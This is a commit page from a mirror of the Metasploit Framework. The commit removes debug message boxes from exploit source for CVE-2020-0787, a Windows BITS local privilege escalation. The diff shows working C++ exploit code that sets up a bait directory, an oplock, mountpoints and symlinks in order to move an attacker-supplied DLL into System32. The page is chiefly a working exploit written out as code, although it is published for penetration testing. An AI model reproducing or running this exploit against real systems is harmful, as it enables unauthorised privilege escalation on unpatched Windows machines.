github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-02 07:40:19 +02:00
Code Releases Activity

Recompile everything so we don't have the messagebox calls

Browse Source
This commit is contained in:
gwillcox-r7 2020-06-11 00:18:45 -05:00
parent d716580ffa
commit 586971428a
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
4 changed files with 2 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2020-0787/CVE-2020-0787.x64.dll
View File

Binary file not shown.

BIN
data/exploits/CVE-2020-0787/CVE-2020-0787.x86.dll
View File

Binary file not shown.

20
external/source/exploits/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp vendored
View File

@ -136,8 +136,8 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
// ========================================================================
// Reconstruct the full path of the TMP file
// ========================================================================
swprintf_s(m_wszBitsTempFilePath, MAX_PATH, L"%ls%ls", m_wszBaitDirPath, m_wszBitsTempFileName);
int result = swprintf_s(m_wszBitsTempFilePath, MAX_PATH, L"%ls%ls", m_wszBaitDirPath, m_wszBitsTempFileName);
if (result == -1)
if (DEBUG) { wprintf_s(L"[DEBUG] BITS temp file path: '%ls'\n", m_wszBitsTempFilePath); }
@ -166,7 +166,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
return FALSE;
}
wprintf_s(L"[*] BITS job has been resumed. Waiting for the oplock to be triggered...\n");
oplock->WaitForLock(INFINITE);
@ -199,7 +198,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
if (DEBUG) { wprintf_s(L"[DEBUG] Created mountpoint: '%ls' -> '%ls'.\n", m_wszMountpointDirPath, wszBaseObjDir); }
// ========================================================================
// Create symlinks
// ========================================================================
@ -220,7 +218,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
delete oplock;
return FALSE;
}
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
// --- Local file -> target DLL ---
@ -238,7 +235,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
delete oplock;
return FALSE;
}
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
@ -274,7 +270,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
ZeroMemory(wszMsg, MAX_MSG * sizeof(WCHAR));
swprintf_s(wszMsg, MAX_MSG, L"[+] Found target file '%ls'. Exploit successfull!\n", m_wszTargetFilePath);
PrintSuccess(wszMsg);
return TRUE;
@ -442,7 +437,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
if (!IsWow64Process(hProcess, &bWow64Process))
{
MessageBoxW(NULL, L"IsWow64Process failed...", L"The Caption", MB_OK);
wprintf_s(L"[!] IsWow64Process() failed (Err: %d).\n", GetLastError());
}
@ -451,7 +445,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
// Disable WOW64 file system redirector
if (!Wow64DisableWow64FsRedirection(&pOldValue))
{
MessageBoxW(NULL, L"Failed at Wow64DisableWow64FsRedirection", L"The Caption", MB_OK);
wprintf_s(L"[!] Wow64DisableWow64FsRedirection() failed (Err: %d).\n", GetLastError());
}
}
@ -472,7 +465,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
// Enable WOW64 file system redirector
if (!Wow64RevertWow64FsRedirection(pOldValue))
{
MessageBoxW(NULL, L"Failed at Wow64DisableWow64FsRedirection call 2 failed!", L"The Caption", MB_OK);
wprintf_s(L"[!] Wow64RevertWow64FsRedirection() failed (Err: %d).\n", GetLastError());
}
}
@ -532,16 +524,12 @@ void BitsArbitraryFileMove::CleanUp()
// Remove bait directory
if (wcslen(m_wszBaitDirPath) > 0)
{
MessageBoxA(NULL, "Removing Bait Directory!!!", "TEST", MB_OK);
MessageBoxW(NULL, m_wszBaitDirPath, L"THE DIRECTORY", MB_OK);
if (GetFileAttributes(m_wszBaitDirPath) != INVALID_FILE_ATTRIBUTES)
{
if (!RemoveDirectory(m_wszBaitDirPath)) {
MessageBoxA(NULL, "Failed to remove bait directory, error occurred!", "ERROR", MB_OK);
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszBaitDirPath, GetLastError());
}
else {
MessageBoxA(NULL, "Removed Bait Directory!!!", "TEST", MB_OK);
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszBaitDirPath); }
}
}
@ -550,16 +538,12 @@ void BitsArbitraryFileMove::CleanUp()
// Remove workspace directory
if (wcslen(m_wszWorkspaceDirPath) > 0)
{
MessageBoxA(NULL, "Removing Workspace Directory!!!", "TEST", MB_OK);
MessageBoxW(NULL, m_wszWorkspaceDirPath, L"THE DIRECTORY", MB_OK);
if (GetFileAttributes(m_wszWorkspaceDirPath) != INVALID_FILE_ATTRIBUTES)
{
if (!RemoveDirectory(m_wszWorkspaceDirPath)) {
MessageBoxA(NULL, "Failed to remove workspace directory, error occurred!", "ERROR", MB_OK);
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszWorkspaceDirPath, GetLastError());
}
else {
MessageBoxA(NULL, "Removed workspace directory!", "Success!", MB_OK);
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszWorkspaceDirPath); }
}
}

7
external/source/exploits/CVE-2020-0787/CVE-2020-0787/dllmain.cpp vendored
View File

@ -89,22 +89,15 @@ DWORD exploit(char * metasploitDLLPath) {
const WCHAR* targetDLLPath = L"C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll";
MessageBoxA(NULL, "Loaded successfully", "The Caption", MB_OK);
HANDLE hProcessHeap = GetProcessHeap();
DWORD pathSize = sizeof(metasploitDLLPath);
LPWSTR unicodeMetasploitDLLPath = AllocMultiByteToWideChar(hProcessHeap, metasploitDLLPath, &pathSize);
MessageBoxA(NULL, "Trying to run the tests now!", "Test", MB_OK);
if (!bitsArbitraryFileMove.Run(unicodeMetasploitDLLPath, targetDLLPath))
{
MessageBoxA(NULL, "Failed setting things up", "The Caption", MB_OK);
return 1;
}
MessageBoxA(NULL, "Setting things up succeeded!", "The Caption", MB_OK);
return 0;
}